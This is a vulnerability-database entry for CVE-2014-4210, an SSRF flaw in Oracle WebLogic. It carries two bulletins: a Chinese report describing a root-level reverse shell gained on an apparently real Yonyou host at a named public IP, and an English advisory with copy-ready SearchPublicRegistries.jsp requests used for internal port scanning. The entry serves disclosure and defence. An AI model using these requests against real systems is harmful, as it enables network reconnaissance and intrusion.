Vulnerabilities > CVE-2014-4210 - Remote Security vulnerability in Oracle WebLogic Server
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 |
Seebug
bulletinFamily exploit description ### 简要描述: 1.SSRF内网信息嗅探; 2.Java反序列化命令执行:获取系统权限。 ### 详细说明: 用友私有云运营中心 http://219.232.202.154:8080/#/home [<img src="https://images.seebug.org/upload/201512/10005828b7d30e5f06178972c3e212e8a414e3ed.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/10005828b7d30e5f06178972c3e212e8a414e3ed.png) 部署的weblogic: [<img src="https://images.seebug.org/upload/201512/10005902570fd3b893016d8ba2b1ab0ca064eebc.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/10005902570fd3b893016d8ba2b1ab0ca064eebc.png) ### 漏洞证明: 1.SSRF 默认搜索页面存在: [<img src="https://images.seebug.org/upload/201512/100059475f15a213edd5375e9d3edb59bddeb8d7.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/100059475f15a213edd5375e9d3edb59bddeb8d7.png) 结合http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html,以localhost为例进行测试: [<img src="https://images.seebug.org/upload/201512/100100050e1ee5726adaa9306ded55aebe3b529d.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/100100050e1ee5726adaa9306ded55aebe3b529d.png) 2.Java反序列化命令执行 测试EXP: [<img src="https://images.seebug.org/upload/201512/10010027324f796189765a9f89ad8122f2229421.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/10010027324f796189765a9f89ad8122f2229421.png) 成功反弹shell: [<img src="https://images.seebug.org/upload/201512/1001010279f70e341cb0f3945498b67b1016c1eb.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1001010279f70e341cb0f3945498b67b1016c1eb.png) root权限,系统已经沦陷: [<img src="https://images.seebug.org/upload/201512/10010122c5f584ba2bf73fb318109ae518527c9c.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/10010122c5f584ba2bf73fb318109ae518527c9c.png) 本次测试,未对系统进行恶意破坏。 id SSV:93386 last seen 2017-11-19 modified 2015-12-10 published 2015-12-10 reporter Root title 用友某系统漏洞(SSRF&Java反序列化命令执行漏洞) bulletinFamily exploit description <p><b>CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp</b></p><p>Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6</p><p>Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.</p><p>Below is an example request to an internal host which is not listening on TCP port 23:</p><pre>https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://<font color="red">10.0.0.4:23</font>&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search</pre><p>Response snippet:</p><pre>weblogic.uddi.client.structures.exception.XML_SoapException: <font color="red">Connection refused</font></pre><p>Below is an example request to a host which is listening on TCP port 22:</p><pre>https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://<font color="red">10.0.0.4:22</font>&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search</pre><p>Response snippet:</p><pre>weblogic.uddi.client.structures.exception.XML_SoapException: <font color="red">Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.</font></pre><p>It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.</p><p>SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).</p> id SSV:89312 last seen 2017-11-19 modified 2015-09-06 published 2015-09-06 reporter qingxp9 title Oracle WebLogic SSRF And XSS
References
- http://seclists.org/fulldisclosure/2014/Dec/23
- http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
- http://www.securityfocus.com/archive/1/534161/100/0/threaded
- http://www.securityfocus.com/bid/68629
- http://www.vmware.com/security/advisories/VMSA-2014-0012.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/94554